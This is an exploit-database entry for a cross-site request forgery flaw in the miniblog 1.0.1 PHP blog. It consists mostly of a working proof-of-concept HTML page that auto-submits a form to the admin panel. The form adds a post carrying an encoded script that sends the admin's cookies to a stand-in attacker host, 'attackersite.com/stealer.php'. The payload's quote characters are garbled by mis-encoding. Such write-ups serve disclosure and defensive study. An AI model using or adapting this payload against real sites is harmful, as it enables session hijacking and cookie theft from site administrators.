miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

EDB-ID:

40480

CVE:

N/A


Author:

Besim

Type:

webapps


Platform:

PHP

Date:

2016-10-09


# Exploit Title :              miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author :                     Besim
# Google Dork :                
# Date :                       09/10/2016
# Type :                       webapps
# Platform :                   PHP
# Vendor Homepage :  http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip


Description (admin login required) : 

miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections

Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add

Dangerous point : if used with XSS can be steal on the admin's cookie information.


*############### CSRF PoC ###############*


<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data&#91;post&#95;title&#93;"
value="<script>location&#46;href&#32;&#61;&#32;â&#128;&#152;http&#58;&#47;&#47;www&#46;attackersite&#46;com&#47;stealer&#46;php&#63;cookie&#61;â&#128;&#153;&#43;document&#46;cookie&#59;<&#47;script>"
/> <input type="hidden" name="data&#91;post&#95;content&#93;"
value="tester" /> <input type="hidden" name="data&#91;published&#93;"
value="1" /> <input type="hidden" name="miniblog&#95;PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>



########################################